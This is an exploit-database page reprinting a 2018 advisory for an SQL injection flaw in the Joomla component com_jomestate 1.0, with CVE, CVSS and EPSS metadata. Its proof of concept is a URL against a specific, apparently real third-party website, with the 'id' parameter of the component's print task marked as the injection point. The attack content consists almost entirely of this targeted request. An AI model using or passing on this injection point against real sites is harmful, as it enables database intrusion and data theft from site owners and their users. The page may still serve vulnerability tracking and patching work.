Advertisement






Joomla com_jomestate 1.0 Sql injection Vulnerability

CVE Category Price Severity
CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-03-06
CPE
cpe:cpe:/a:joomla:jomestate:1.0
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H 0.0342 0.68905

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018030048

Below is a copy:

Joomla com_jomestate 1.0 Sql injection Vulnerability
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
| # Title    : Joomla com_jomestate 1.0 Sql injection Vulnerability
| # Author   : indoushka
| # email    : [email protected]
| # Tested on: windows 8.1 Franais V.(Pro)
| # Vendor   : Copyright (C) 2009 COMDEV. All rights reserved.
===========================================================

Poc :

http://www.citiquays.co.uk/index.php?option=com_jomestate&task=print&id= <===inject her

Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * http://packetstormsecurity.com 
Hussin-X *D4NB4R* KnocKout * https://www.corelan.be *
---------------------------------------------------------------------------------------

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum